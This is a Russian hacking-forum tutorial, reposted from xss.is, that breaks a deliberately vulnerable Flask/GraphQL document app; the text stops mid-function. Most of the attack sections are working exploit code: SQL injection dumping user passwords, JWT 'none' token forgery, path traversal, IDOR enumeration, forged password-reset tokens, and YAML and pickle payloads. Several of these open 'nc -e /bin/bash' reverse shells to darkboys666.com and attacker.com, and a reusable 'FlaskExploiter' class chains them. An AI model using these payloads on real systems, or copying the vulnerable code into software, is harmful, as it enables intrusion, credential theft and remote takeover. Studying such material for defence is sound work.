D2
Администратор
- Регистрация
- 19 Фев 2025
- Сообщения
- 4,380
- Реакции
- 0
Авторство: hackeryaroslav
Источник: xss.is
Введение
Всем привет! Сегодня мы с вами будем разбираться в интересной истории. А начинается она так: два энтузиаста, Саша и Коля, увидели огромный потенциал в своей новой бизнес-идее и решили создать его. В то время как первый занимается бекэндом, сыпля множество полезных функций каждый день, Коля не успевает внедрить это во фронтенд. Но оба не учли одну вещь — а именно защиту своего приложения. К счастью, у них есть ты, который сегодня посмотрит на код и расскажет, почему он уязвим и как это можно эксплуатировать.
Статья будет состоять из трех частей. Первая — знакомство с самим проектом, кратко объясним код. Во второй части мы будем атаковать приложение и писать свои мини-эксплойты. Третья часть будет посвящена разбору коммитов, которые Саша хотел загрузить в свое приложение, и уязвимостям, которые они имеют.
Часть 1 - знакомство
Код: Скопировать в буфер обмена
Код:
|-- run.py
|-- uploads
|-- app
|-- config.py
|-- __init__.py
|-- models
|-- document.py
|-- user.py
|-- __init__.py
|-- routes
|-- admin.py
|-- api.py
|-- auth.py
|-- document.py
|-- __init__.py
|-- services
|-- document_processor.py
|-- pdf_generator.py
|-- __init__.py
|-- templates
|-- admin.html
|-- base.html
|-- dashboard.html
|-- edit_document.html
|-- index.html
|-- login.html
|-- register.html
|-- view_document.html
|-- api
|-- __init__.py
|-- rest
|-- endpoints.py
|-- __init__.py
|-- graphql
|-- resolvers.py
|-- schema.py
|-- __init__.py
|-- static
|-- css
|-- style.css
|-- js
Python: Скопировать в буфер обмена
Код:
# app/api/graphql/resolver.py
import graphene
from app.models.document import Document
from app import db
class DocumentType(graphene.ObjectType):
id = graphene.Int()
filename = graphene.String()
content = graphene.String()
owner_id = graphene.Int()
class Query(graphene.ObjectType):
documents = graphene.List(DocumentType)
def resolve_documents(self, info):
return db.session.query(Document).all()
- Импортируемые модули:
- graphene: библиотека для создания GraphQL-схем.
- Document: модель, представляющая документ в базе данных.
- db: объект базы данных для выполнения запросов.
- DocumentType: класс GraphQL-объекта, описывающий структуру данных для документа.
- Атрибуты: id, filename, content, и owner_id, каждый из которых соответствует полям модели Document.
- Query: основной класс запроса, содержащий поле documents, которое возвращает список документов.
- resolve_documents: метод, который обрабатывает запросы documents и возвращает все документы из базы данных с помощью db.session.query(Document).all()
Код:
# app/api/graphql/schema.py
import graphene
from graphql import GraphQLError
from app.models.document import Document
from app.services.document_processor import DocumentProcessor
from app import db
class DocumentType(graphene.ObjectType):
id = graphene.ID()
filename = graphene.String()
content = graphene.String()
metadata = graphene.JSONString()
is_public = graphene.Boolean()
class Query(graphene.ObjectType):
documents = graphene.List(
DocumentType,
owner_id=graphene.Int(),
search=graphene.String()
)
def resolve_documents(self, info, owner_id=None, search=None):
query = f"""
SELECT * FROM documents
WHERE owner_id = {owner_id}
AND content ILIKE '%{search}%'
"""
return db.session.execute(query)
class ProcessDocument(graphene.Mutation):
class Arguments:
content = graphene.String()
template = graphene.String()
Output = DocumentType
def mutate(self, info, content, template):
processor = DocumentProcessor()
processed = processor.process_document(content, template)
doc = Document(
filename=template,
content=processed,
owner_id=1
)
db.session.add(doc)
db.session.commit()
return doc
class Mutation(graphene.ObjectType):
process_document = ProcessDocument.Field()
schema = graphene.Schema(query=Query, mutation=Mutation)
- DocumentType:
- Расширенный GraphQL-тип для документа с дополнительными полями metadata и is_public.
- Query:
- Поле documents поддерживает фильтрацию по owner_id и search.
- ProcessDocument:
- Мутация для обработки документа с использованием сервиса DocumentProcessor.
- Создаёт и сохраняет новый документ в базе данных.
- Mutation:
- Определяет мутацию process_document, которая вызывает ProcessDocument.
- Schema:
- Объединяет запросы и мутации в одну GraphQL-схему.
Код:
# app/api/rest/endpoints.py
from flask import Blueprint, jsonify
from app.models.document import Document
bp = Blueprint('endpoints', __name__, url_prefix='/api/v1')
@bp.route('/documents', methods=['GET'])
def list_documents():
docs = Document.query.all()
return jsonify([doc.to_dict() for doc in docs])
- Blueprint:
- Создаёт объект Blueprint с именем 'endpoints' и префиксом URL /api/v1. Это позволяет группировать связанные маршруты.
- Маршрут /documents:
- Обрабатывает GET-запросы для получения списка документов.
- Document.query.all(): Получает все документы из базы данных.
- jsonify([doc.to_dict() for doc in docs]): Преобразует каждый документ в словарь с помощью метода to_dict() и возвращает JSON-ответ.
Код:
# app/models/document.py
from app import db
from sqlalchemy.dialects.postgresql import JSONB
from datetime import datetime
class Document(db.Model):
__tablename__ = 'documents'
id = db.Column(db.Integer, primary_key=True)
filename = db.Column(db.String(255), nullable=False)
content = db.Column(db.Text)
content_type = db.Column(db.String(100))
metadata_ = db.Column('metadata', JSONB)
owner_id = db.Column(db.Integer, db.ForeignKey('users.id'), nullable=False)
created_at = db.Column(db.DateTime, default=datetime.utcnow)
is_public = db.Column(db.Boolean, default=False)
- __tablename__:
- Указывает имя таблицы в базе данных — documents.
- Поля модели:
- id: Первичный ключ, уникальный идентификатор документа.
- filename: Имя файла (строка до 255 символов), обязательное поле.
- content: Текстовое содержимое документа.
- content_type: Тип содержимого (например, текст, изображение).
- metadata_: Хранит JSONB данные, позволяет сохранять структурированную информацию.
- owner_id: Идентификатор владельца, внешний ключ на таблицу users.
- created_at: Дата и время создания документа, по умолчанию текущая дата/время.
- is_public: Флаг, указывающий, является ли документ общедоступным (по умолчанию False).
Код:
# app/models/user.py
from app import db
from sqlalchemy.dialects.postgresql import JSONB
import jwt
from flask import current_app
from datetime import datetime, timedelta
from werkzeug.security import generate_password_hash, check_password_hash
from flask_login import UserMixin
class User(db.Model, UserMixin):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(80), unique=True, nullable=False)
password = db.Column(db.String(255), nullable=False)
email = db.Column(db.String(120), unique=True, nullable=False)
role = db.Column(db.String(20), default='user')
user_metadata = db.Column(JSONB)
created_at = db.Column(db.DateTime, default=datetime.utcnow)
documents = db.relationship('Document', backref='owner', lazy=True)
def set_password(self, password):
self.password = generate_password_hash(password)
def check_password(self, password):
return check_password_hash(self.password, password)
def generate_token(self):
payload = {
'user_id': self.id,
'role': self.role,
'exp': datetime.utcnow() + timedelta(days=1)
}
return jwt.encode(
payload,
current_app.config['JWT_SECRET'],
algorithm='HS256'
)
@staticmethod
def verify_token(token):
try:
payload = jwt.decode(
token,
current_app.config['JWT_SECRET'],
algorithms=['HS256', 'none']
)
return User.query.get(payload['user_id'])
except:
return None
- __tablename__:
- Определяет имя таблицы в базе данных — users.
- Поля модели:
- id: Первичный ключ.
- username: Уникальное имя пользователя, обязательное поле.
- password: Хэшированный пароль.
- email: Уникальный email, обязательное поле.
- role: Роль пользователя (по умолчанию user).
- user_metadata: JSONB-данные для хранения дополнительной информации о пользователе.
- created_at: Время создания пользователя.
- documents: Связь с таблицей documents, представляющая все документы, принадлежащие пользователю.
- Методы:
- set_password: Генерирует хэш для пароля и сохраняет его.
- check_password: Проверяет соответствие пароля с хранимым хэшем.
- generate_token: Создаёт JWT для пользователя с полями user_id и role, срок действия — 1 день.
- verify_token: Проверяет и декодирует JWT, возвращая объект пользователя, если токен действителен.
Код:
# app/routes/admin.py
from flask import Blueprint, request, jsonify
from app.models.user import User
import yaml
from app import db
bp = Blueprint('admin', __name__)
def admin_required(f):
def admin_wrapper(*args, **kwargs):
token = request.headers.get('Authorization')
if not token:
return jsonify({'error': 'No token'}), 401
user = User.verify_token(token.split()[1])
if not user or user.role != 'admin':
return jsonify({'error': 'Not authorized'}), 403
return f(*args, **kwargs)
return admin_wrapper
@bp.route('/admin/users', methods=['GET'], endpoint='list_users')
@admin_required
def list_users():
search = request.args.get('search', '')
query = f"SELECT * FROM users WHERE username LIKE '%{search}%'"
results = db.session.execute(query).fetchall()
return jsonify([dict(r) for r in results])
@bp.route('/admin/config', methods=['POST'], endpoint='update_config')
@admin_required
def update_config():
config = yaml.load(request.data, Loader=yaml.Loader)
with open('config.yml', 'w') as f:
yaml.dump(config, f)
return jsonify({'message': 'Config updated'})
- Blueprint:
- Создаётся Blueprint с именем 'admin' для организации административных маршрутов.
- Декоратор admin_required:
- Проверяет наличие и действительность JWT-токена в заголовках запроса.
- Если токен отсутствует или пользователь не является администратором, возвращает ошибки 401 (Unauthorized) или 403 (Forbidden).
- Маршрут /admin/users:
- Обрабатывает GET-запросы для получения списка пользователей с поддержкой поиска по имени пользователя.
- Возвращает результаты в формате JSON.
- Маршрут /admin/config:
- Обрабатывает POST-запросы для обновления конфигурации приложения, загружая данные из YAML.
- Записывает обновлённые данные в файл config.yml
Код:
# app/routes/api.py
from flask import Blueprint, request, jsonify
from app.models.document import Document
from app import db
bp = Blueprint('api', __name__, url_prefix='/api')
@bp.route('/documents', methods=['GET'])
def get_documents():
documents = Document.query.all()
return jsonify([doc.to_dict() for doc in documents])
@bp.route('/documents', methods=['POST'])
def create_document():
data = request.get_json()
new_doc = Document(
filename=data['filename'],
content=data['content'],
owner_id=data['owner_id']
)
db.session.add(new_doc)
db.session.commit()
return jsonify(new_doc.to_dict()), 201
- Blueprint:
- Создаётся Blueprint с именем 'api' и префиксом URL /api для организации маршрутов API.
- Маршрут GET /documents:
- Обрабатывает GET-запросы для получения всех документов из базы данных.
- Использует метод Document.query.all() для извлечения документов и возвращает их в формате JSON, преобразуя каждый документ в словарь с помощью метода to_dict().
- Маршрут POST /documents:
- Обрабатывает POST-запросы для создания нового документа.
- Получает данные в формате JSON из тела запроса с помощью request.get_json().
- Создаёт новый объект Document с полученными данными (имя файла, содержание и идентификатор владельца).
- Добавляет новый документ в сессию базы данных и сохраняет изменения с помощью db.session.commit().
- Возвращает созданный документ в формате JSON с HTTP-статусом 201 (Created).
Код:
# app/routes/auth.py
from flask import Blueprint, request, jsonify, render_template, redirect, url_for, flash
from flask_login import login_user, logout_user, login_required, current_user
from app.models.user import User
from app import db
from app.models.document import Document
from flask import current_app
import os
bp = Blueprint('auth', __name__)
@bp.route('/')
def index():
return render_template('index.html')
@bp.route('/upload', methods=['POST'])
def upload_document():
file = request.files['file']
if file:
filename = file.filename
file_path = os.path.join(current_app.config['UPLOAD_FOLDER'], filename)
file.save(file_path)
new_doc = Document(filename=filename, content='', owner_id=current_user.id)
db.session.add(new_doc)
db.session.commit()
flash('File uploaded successfully')
return redirect(url_for('main.dashboard'))
flash('No file selected')
return redirect(url_for('main.dashboard'))
@bp.route('/login', methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('auth.index'))
if request.method == 'POST':
username = request.form.get('username')
password = request.form.get('password')
user = User.query.filter_by(username=username).first()
if user and user.check_password(password):
login_user(user)
next_page = request.args.get('next')
return redirect(next_page if next_page else url_for('auth.index'))
flash('Invalid username or password')
return render_template('login.html')
@bp.route('/dashboard')
@login_required
def dashboard():
documents = Document.query.filter_by(owner_id=current_user.id).all()
return render_template('dashboard.html', documents=documents)
@bp.route('/register', methods=['GET', 'POST'])
def register():
if request.method == 'POST':
username = request.form.get('username')
password = request.form.get('password')
email = request.form.get('email')
if User.query.filter_by(username=username).first():
flash('Username already exists')
return redirect(url_for('auth.register'))
user = User(username=username, email=email)
user.set_password(password)
db.session.add(user)
db.session.commit()
flash('Registration successful')
return redirect(url_for('auth.login'))
return render_template('register.html')
@bp.route('/logout')
@login_required
def logout():
logout_user()
return redirect(url_for('auth.index'))
- Blueprint:
- Создаётся Blueprint с именем 'auth' для организации маршрутов аутентификации.
- Маршрут /:
- Отображает главную страницу с использованием шаблона index.html.
- Маршрут /upload:
- Обрабатывает POST-запросы для загрузки документов.
- Получает файл из формы и сохраняет его в указанной папке (UPLOAD_FOLDER).
- Создаёт новый объект Document, сохраняя имя файла и идентификатор текущего пользователя.
- Добавляет документ в базу данных и перенаправляет пользователя на страницу панели управления.
- Маршрут /login:
- Обрабатывает GET и POST запросы для аутентификации пользователей.
- Проверяет, является ли пользователь уже аутентифицированным, и перенаправляет на главную страницу, если это так.
- Если это POST-запрос, проверяет наличие пользователя и соответствие пароля, используя методы модели User.
- В случае успеха аутентификации пользователя перенаправляет на следующую страницу или на главную.
- Маршрут /dashboard:
- Доступен только для аутентифицированных пользователей.
- Отображает список документов, принадлежащих текущему пользователю, на странице dashboard.html.
- Маршрут /register:
- Обрабатывает GET и POST запросы для регистрации новых пользователей.
- Проверяет наличие существующего имени пользователя перед созданием нового пользователя.
- Хэширует пароль и сохраняет нового пользователя в базе данных.
- Маршрут /logout:
- Вызывает функцию logout_user, чтобы выйти из системы и перенаправить на главную страницу.
Код:
# app/routes/document.py
from flask import Blueprint, render_template, abort, request, redirect, url_for
from app.models.document import Document
from app import db
bp = Blueprint('document', __name__)
@bp.route('/document/<int:doc_id>', methods=['GET'])
def view_document(doc_id):
document = Document.query.get(doc_id)
if document is None:
abort(404)
return render_template('view_document.html', document=document)
@bp.route('/document/<int:doc_id>/edit', methods=['GET', 'POST'])
def edit_document(doc_id):
document = Document.query.get(doc_id)
if document is None:
abort(404)
if request.method == 'POST':
document.content = request.form['content']
db.session.commit()
return redirect(url_for('document.view_document', doc_id=doc_id))
return render_template('edit_document.html', document=document)
- Blueprint:
- Создаётся Blueprint с именем 'document' для организации маршрутов, связанных с документами.
- Маршрут /document/<int:doc_id>:
- Обрабатывает GET-запросы для отображения документа по заданному идентификатору doc_id.
- Использует метод Document.query.get(doc_id) для извлечения документа из базы данных.
- Если документ не найден, вызывается ошибка 404 (Not Found).
- Если документ существует, отображается шаблон view_document.html, передавая документ как контекст.
- Маршрут /document/<int:doc_id>/edit:
- Обрабатывает как GET, так и POST запросы для редактирования содержимого документа.
- Сначала извлекает документ по идентификатору doc_id.
- Если документ не найден, вызывается ошибка 404 (Not Found).
- Если это POST-запрос, обновляет содержимое документа, полученное из формы, и сохраняет изменения в базе данных через db.session.commit().
- После успешного редактирования перенаправляет пользователя на страницу просмотра документа.
Код:
# app/services/document_processor.py
import os
import yaml
from jinja2 import Template
import subprocess
from flask import current_app
class DocumentProcessor:
def process_document(self, content, template_name):
template_path = os.path.join(
current_app.config['TEMPLATES_FOLDER'],
template_name
)
config = yaml.load(content, Loader=yaml.Loader)
with open(template_path) as f:
template = Template(f.read())
rendered = template.render(**config)
return self.generate_pdf(rendered)
def generate_pdf(self, html_content):
output_path = os.path.join(current_app.config['UPLOAD_FOLDER'], 'output.pdf')
cmd = f'wkhtmltopdf - {output_path}'
process = subprocess.Popen(
cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE
)
process.communicate(input=html_content.encode())
return output_path
- Импорт библиотек:
- Используются библиотеки os для работы с файловой системой, yaml для загрузки конфигурации, jinja2 для рендеринга HTML-шаблонов и subprocess для выполнения командных процессов.
- Класс DocumentProcessor:
- Содержит методы для обработки документов и генерации PDF-файлов.
- Метод process_document(self, content, template_name):
- Принимает содержимое документа и имя шаблона.
- Определяет путь к шаблону, используя конфигурацию приложения (TEMPLATES_FOLDER).
- Загружает содержимое YAML из строки content в переменную config с использованием yaml.load().
- Читает шаблон из файла и создаёт объект Template.
- Рендерит HTML-контент, подставляя значения из config.
- Вызывает метод generate_pdf(rendered), передавая сгенерированный HTML для создания PDF.
- Метод generate_pdf(self, html_content):
- Принимает HTML-контент и генерирует PDF-файл с использованием утилиты wkhtmltopdf.
- Определяет путь для сохранения сгенерированного PDF.
- Создаёт процесс с помощью subprocess.Popen, который запускает команду wkhtmltopdf, передавая HTML-контент через стандартный ввод.
- Возвращает путь к сгенерированному PDF-файлу.
Код:
# app/services/pdf_generator.py
import pdfkit
import os
class PDFGenerator:
def generate_pdf(self, html_content):
output_path = os.path.join('uploads', 'output.pdf')
pdfkit.from_string(html_content, output_path)
return output_path
- Импорт библиотек:
- Используется библиотека pdfkit, которая является интерфейсом для утилиты wkhtmltopdf, позволяющей конвертировать HTML-контент в PDF.
- Импортируется os для работы с файловой системой.
- Класс PDFGenerator:
- Содержит метод generate_pdf, предназначенный для генерации PDF-файла из предоставленного HTML-контента.
- Метод generate_pdf(self, html_content):
- Принимает строку html_content, представляющую HTML-контент, который будет конвертирован в PDF.
- Определяет путь для сохранения выходного PDF-файла, используя os.path.join для создания пути к директории uploads.
- Вызывает pdfkit.from_string(html_content, output_path) для конвертации HTML в PDF и сохранения результата по указанному пути.
- Возвращает путь к сгенерированному PDF-файлу.
Код:
# app/__init__.py
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_graphql import GraphQLView
from flask_login import LoginManager, current_user
from app.config import Config
db = SQLAlchemy()
login_manager = LoginManager()
def create_app():
app = Flask(__name__)
app.config.from_object(Config)
db.init_app(app)
login_manager.init_app(app)
login_manager.login_view = 'auth.login'
login_manager.login_message = 'Please log in to access this page.'
@app.context_processor
def inject_user():
return dict(current_user=current_user)
from app.routes import auth, admin, api, document
app.register_blueprint(auth.bp)
app.register_blueprint(admin.bp)
app.register_blueprint(document.bp)
app.register_blueprint(api.bp)
from app.api.graphql.schema import schema
app.add_url_rule(
'/graphql',
view_func=GraphQLView.as_view('graphql', schema=schema, graphiql=True)
)
with app.app_context():
db.create_all()
return app
from app.models.user import User
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
- Импорт библиотек:
- Импортируются необходимые модули из Flask, Flask-SQLAlchemy, Flask-GraphQL и Flask-Login, а также конфигурация приложения.
- Инициализация компонентов:
- db = SQLAlchemy(): Создаёт объект SQLAlchemy для работы с базой данных.
- login_manager = LoginManager(): Создаёт объект для управления сессиями пользователей.
- Функция create_app():
- Создаёт и настраивает экземпляр приложения Flask:
- app = Flask(__name__): Инициализация приложения.
- app.config.from_object(Config): Загружает конфигурацию из файла Config.
- Создаёт и настраивает экземпляр приложения Flask:
- Настройка базы данных и аутентификации:
- db.init_app(app): Привязывает объект базы данных к приложению.
- login_manager.init_app(app): Инициализирует менеджер аутентификации с приложением.
- Устанавливаются параметры для входа и сообщения о необходимости входа (login_view, login_message).
- Контекстный процессор:
- @app.context_processor: Определяет функцию inject_user(), которая добавляет текущего пользователя в контекст шаблонов, позволяя получать доступ к current_user во всех шаблонах.
- Регистрация маршрутов:
- Импортируются и регистрируются Blueprint-ы для маршрутов: auth, admin, document, и api.
- app.add_url_rule('/graphql', ...): Добавляет маршрут для GraphQL API с возможностью использовать интерфейс graphiql.
- Создание базы данных:
- with app.app_context(): db.create_all(): Создаёт все таблицы в базе данных, если они ещё не существуют.
- Функция загрузки пользователя:
- @login_manager.user_loader: Определяет функцию load_user, которая получает пользователя из базы данных по его идентификатору. Это необходимо для восстановления текущего пользователя в сессиях.
Теперь, когда мы наконец ознакомились с проектом, где некоторые из вас могли заметить уязвимости, готовы атаковать. Давайте начнем.
1. SQL-инъекции через GraphQL API
В файле app/api/graphql/schema.py обнаружена критическая уязвимость в методе resolve_documents:Python: Скопировать в буфер обмена
Код:
def resolve_documents(self, info, owner_id=None, search=None):
query = f"""
SELECT * FROM documents
WHERE owner_id = {owner_id}
AND content ILIKE '%{search}%'
"""
return db.session.execute(query)
Почему происходит уязвимость?
Небезопасная вставка параметров:В коде resolve_documents пользовательские параметры owner_id и search напрямую вставляются в SQL-запрос. Это открывает возможность для SQL-инъекций, так как атакующий может вставить вредоносный SQL-код. Например:
Python: Скопировать в буфер обмена
Код:
query {
documents(
owner_id: 1,
search: "' UNION SELECT id, username, password, email FROM users --"
) {
id
filename
content
}
}
- search содержит SQL-инъекцию: "' UNION SELECT id, username, password, email FROM users --".
- Запрос объединяет данные из таблицы documents и users, возвращая критическую информацию (логины, пароли и email-адреса).
2. Небезопасная десериализация YAML
В DocumentProcessor используется небезопасный загрузчик YAML:Python: Скопировать в буфер обмена
Код:
# services/document_processor.py
config = yaml.load(content, Loader=yaml.Loader)
Почему происходит уязвимость?
Небезопасная десериализация:Использование yaml.load с yaml.Loader позволяет десериализовать YAML-документ, содержащий произвольные объекты, включая команды системы. Например:
Python: Скопировать в буфер обмена
Код:
import requests
import yaml
payload = """!!python/object/apply:os.system
args: ['nc -e /bin/bash darkboys666.com 4444']
"""
r = requests.post(
'http://target.com/api/documents',
json={
'filename': 'exploit.yml',
'content': payload,
'template': 'basic'
}
)
- !!python/object/apply
s.system указывает YAML десериализатору вызвать функцию os.system.
- args: ['nc -e /bin/bash darkboys666.com 4444'] выполняет обратное соединение через netcat, открывая атакующему удаленный доступ к командной строке на сервере.
3. JWT-уязвимости в аутентификации
В User модели найдена уязвимость в верификации токена:Python: Скопировать в буфер обмена
Код:
@staticmethod
def verify_token(token):
try:
payload = jwt.decode(
token,
current_app.config['JWT_SECRET'],
algorithms=['HS256', 'none'] # Уязвимый код
)
return User.query.get(payload['user_id'])
except:
return None
Почему возникает уязвимость?
Алгоритм "none" в JWT:JWT (JSON Web Token) обеспечивает безопасность путем подписи токена с использованием секретного ключа или публично-частной пары ключей. Алгоритм none в JWT отключает проверку подписи, позволяя атакующему создавать поддельные токены, которые сервер принимает как подлинные. Например:
Python: Скопировать в буфер обмена
Код:
import jwt
payload = {
'user_id': 1,
'role': 'admin',
'exp': 1735689600
}
token = jwt.encode(payload, '', algorithm='none')
Разбор эксплуатации:
- Создание токена с алгоритмом none:
Атакующий создает токен с нужными данными (user_id, role, exp), не используя подпись. - Подделка токена:
Этот токен отправляется серверу. Поскольку сервер допускает алгоритм none, он не проверяет подпись. - Получение несанкционированного доступа:
Атакующий получает доступ как пользователь с user_id 1 и ролью admin.
4. Command Injection в PDF генераторе
В document_processor.py:Python: Скопировать в буфер обмена
Код:
def generate_pdf(self, html_content):
output_path = os.path.join(current_app.config['UPLOAD_FOLDER'], 'output.pdf')
cmd = f'wkhtmltopdf - {output_path}'
process = subprocess.Popen(
cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE
)
Почему возникает уязвимость?
Использование subprocess.Popen с shell=True:Когда shell=True используется в subprocess.Popen, любые команды переданные через cmd обрабатываются оболочкой. Это делает код уязвимым для внедрения команд, особенно если входные данные пользователя (например, html_content) могут быть интерпретированы как команда оболочки. Например:
Python: Скопировать в буфер обмена
Код:
content = """
<script>
document.write('<img src="x" onerror="require(\'child_process\').exec(\'nc -e /bin/bash attacker.com 4444\')">')
</script>
"""
r = requests.post(
'http://target.com/api/documents/process',
json={'content': content, 'template': 'basic.html'}
)
Разбор эксплуатации:
- Загрузка вредоносного HTML:
Атакующий отправляет HTML, который включает JavaScript для выполнения команды nc -e /bin/bash attacker.com 4444. - Обработка команд:
wkhtmltopdf обрабатывает HTML, а JavaScript внутри HTML выполняет вызов child_process.exec. - Результат:
Команда nc -e /bin/bash attacker.com 4444 открывает обратное соединение с сервером атакующего, предоставляя ему удаленный доступ.
5. Небезопасная загрузка файлов
В routes/auth.py:Python: Скопировать в буфер обмена
Код:
@bp.route('/upload', methods=['POST'])
def upload_document():
file = request.files['file']
if file:
filename = file.filename # Нет валидации
file_path = os.path.join(current_app.config['UPLOAD_FOLDER'], filename)
file.save(file_path)
Почему возникает уязвимость?
Path Traversal:Когда пользовательские файлы сохраняются без валидации пути, атакующий может использовать последовательности ../ для доступа и перезаписи файлов за пределами назначенной директории. Например:
Python: Скопировать в буфер обмена
Код:
import requests
files = {
'file': ('../../app/templates/login.html', '{% extends "base.html" %}{% block content %}<script>alert(1)</script>{% endblock %}')
}
r = requests.post(
'http://target.com/upload',
files=files
)
Разбор эксплуатации:
- Загрузка вредоносного файла:
Атакующий отправляет файл с именем ../../app/templates/login.html и содержимым, включающим JavaScript. - Path Traversal:
Система сохраняет файл по пути ../../app/templates/login.html, перезаписывая оригинальный файл login.html. - Результат:
Когда пользователь посещает страницу входа, загружается измененный файл, и браузер выполняет вредоносный JavaScript.
6. IDOR в доступе к документам
В routes/document.py:Python: Скопировать в буфер обмена
Код:
@bp.route('/document/<int:doc_id>', methods=['GET'])
def view_document(doc_id):
document = Document.query.get(doc_id)
if document is None:
abort(404)
return render_template('view_document.html', document=document)
Почему возникает уязвимость?
Отсутствие проверки прав доступа:В коде обработки запроса нет механизма для проверки, имеет ли текущий пользователь право доступа к запрашиваемому документу. Документ извлекается на основе предоставленного doc_id, но нет проверки, принадлежит ли документ текущему пользователю или имеет ли он к нему доступ. Например:
Python: Скопировать в буфер обмена
Код:
import requests
# Перебор doc_id для доступа к чужим документам
for i in range(1, 100):
r = requests.get(f'http://target.com/document/{i}')
if r.status_code == 200:
print(f"Found document {i}: {r.text}")
Автоматизация эксплойтов
Создадим мини фреймворк для автоматизации этой атаки:Python: Скопировать в буфер обмена
Код:
import requests
import jwt
import yaml
import base64
class FlaskExploiter:
def __init__(self, base_url):
self.base_url = base_url
self.session = requests.Session()
def forge_admin_token(self):
payload = {
'user_id': 1,
'role': 'admin',
'exp': 1735689600
}
return jwt.encode(payload, '', algorithm='none')
def sql_injection_via_graphql(self, query):
injection = {
'query': f"""
query {{
documents(
owner_id: 1,
search: "{query}"
) {{
id
filename
content
}}
}}
"""
}
return self.session.post(f"{self.base_url}/graphql", json=injection)
def yaml_rce(self, command):
payload = f"""!!python/object/apply:os.system
args: ['{command}']
"""
return self.session.post(
f"{self.base_url}/api/documents",
json={
'filename': 'exploit.yml',
'content': payload,
'template': 'basic'
}
)
def path_traversal(self, path, content):
files = {
'file': (f'../../{path}', content)
}
return self.session.post(f"{self.base_url}/upload", files=files)
def dump_database(self):
queries = [
"' UNION SELECT table_name, table_schema, NULL, NULL FROM information_schema.tables --",
"' UNION SELECT column_name, data_type, NULL, NULL FROM information_schema.columns WHERE table_name='users' --",
"' UNION SELECT id, username, password, email FROM users --"
]
results = []
for query in queries:
results.append(self.sql_injection_via_graphql(query).json())
return results
# Использование
exploiter = FlaskExploiter('http://target.com')
token = exploiter.forge_admin_token()
exploiter.session.headers['Authorization'] = f'Bearer {token}'
# Дамп базы
database = exploiter.dump_database()
print(database)
# RCE через YAML
exploiter.yaml_rce('nc -e /bin/bash attacker.com 4444')
# Path traversal
exploiter.path_traversal(
'app/templates/login.html',
'{% extends "base.html" %}{% block content %}<script>alert(1)</script>{% endblock %}'
)
Часть 3 - ревьювим коммиты
Итак, когда мы разобрали существующие уязвимости, настала пора рассмотреть изменения, которые наш бекендер хочет внести. Всё по порядку.
Измения\новые фишки в коде:
Python: Скопировать в буфер обмена
Код:
# routes/auth.py
@bp.route('/reset_password', methods=['POST'])
def reset_password():
email = request.form.get('email')
user = User.query.filter_by(email=email).first()
if user:
token = base64.b64encode(f"{user.id}:{int(time.time())}".encode()).decode()
reset_link = f"/reset/{token}"
return jsonify({"link": reset_link})
@bp.route('/reset/<token>', methods=['POST'])
def confirm_reset(token):
try:
data = base64.b64decode(token).decode()
user_id, timestamp = data.split(':')
user = User.query.get(int(user_id))
if user:
new_password = request.form.get('password')
user.set_password(new_password)
db.session.commit()
return jsonify({"status": "success"})
except:
return jsonify({"error": "Invalid token"}), 400
Выглядит безопасно, не так ли? Нет.
Почему возникает уязвимость?
Предсказуемость токена восстановления пароля:Токен формируется как простая строка, закодированная в Base64, содержащая user_id и метку времени. Этот подход уязвим, потому что:
- Нет криптографической подписи: Атакующий может легко подделать токен.
- Простота структуры токена: user_id и timestamp легко угадать и подделать.
Python: Скопировать в буфер обмена
token = base64.b64encode(f"{user.id}:{int(time.time())}".encode()).decode()
Пример:
Python: Скопировать в буфер обмена
Код:
import base64
import requests
import time
def exploit_password_reset():
# Создаем поддельный токен для любого user_id
fake_token = base64.b64encode(f"1:{int(time.time())}".encode()).decode()
r = requests.post(
f'http://target.com/reset/{fake_token}',
data={'password': 'hacked123'}
)
return r.json()
Разбор эксплуатации:
- Создание поддельного токена:
Кто-то генерирует токен для user_id 1, используя текущее время. - Отправка запроса на сброс пароля:
Он же отправляет запрос на изменение пароля с поддельным токеном. - Результат:
Пароль пользователя с user_id 1 изменяется на новый, указанный им.
Python: Скопировать в буфер обмена
Код:
# services/cache.py
import redis
import pickle
class CacheService:
def __init__(self):
self.redis = redis.Redis(host='localhost', port=6379, db=0)
def set(self, key, value):
# Уязвимая сериализация
pickled = pickle.dumps(value)
self.redis.set(key, pickled)
def get(self, key):
data = self.redis.get(key)
if data:
# Уязвимая десериализация
return pickle.loads(data)
return None
# routes/api.py
@bp.route('/api/cache/set', methods=['POST'])
def set_cache():
cache = CacheService()
data = request.get_json()
cache.set(data['key'], data['value'])
return jsonify({"status": "success"})
интеграция с Redis для кеширования, неплохо ведь?
Почему возникает уязвимость?
Опасность pickle:- pickle позволяет сериализовать и десериализовать произвольные объекты Python. При десериализации он может выполнять произвольный код, если атакующий внедрит вредоносный объект.
- Использование pickle для обработки данных от пользователей без проверки делает приложение уязвимым для RCE.
Python: Скопировать в буфер обмена
Код:
pickled = pickle.dumps(value)
self.redis.set(key, pickled)
return pickle.loads(data)
Например:
Python: Скопировать в буфер обмена
Код:
import pickle
import os
import base64
class RCEPayload:
def __reduce__(self):
cmd = 'nc -e /bin/bash attacker.com 4444'
return os.system, (cmd,)
# Создаем вредоносный объект
payload = pickle.dumps(RCEPayload())
encoded_payload = base64.b64encode(payload).decode()
r = requests.post('http://target.com/api/cache/set', json={
'key': 'exploit',
'value': encoded_payload
})
Разбор эксплуатации:
- Создание вредоносного объекта:
Класс RCEPayload переопределяет метод __reduce__, который указывает pickle вызвать os.system с командой nc -e /bin/bash attacker.com 4444. - Сериализация объекта:
Атакующий сериализует объект RCEPayload с помощью pickle и кодирует его в base64 для отправки. - Отправка вредоносного объекта:
Объект отправляется через API для хранения в Redis. - Десериализация и выполнение команды:
При следующем вызове get сервер десериализует объект, выполняя вредоносную команду.
Python: Скопировать в буфер обмена
Код:
# services/xml_parser.py
from xml.etree import ElementTree
import io
class XMLProcessor:
def parse_document(self, xml_content):
# Уязвимый парсер с XXE
parser = ElementTree.XMLParser()
tree = ElementTree.parse(io.StringIO(xml_content), parser)
return tree.getroot()
# routes/document.py
@bp.route('/import/xml', methods=['POST'])
def import_xml():
xml_content = request.data.decode()
processor = XMLProcessor()
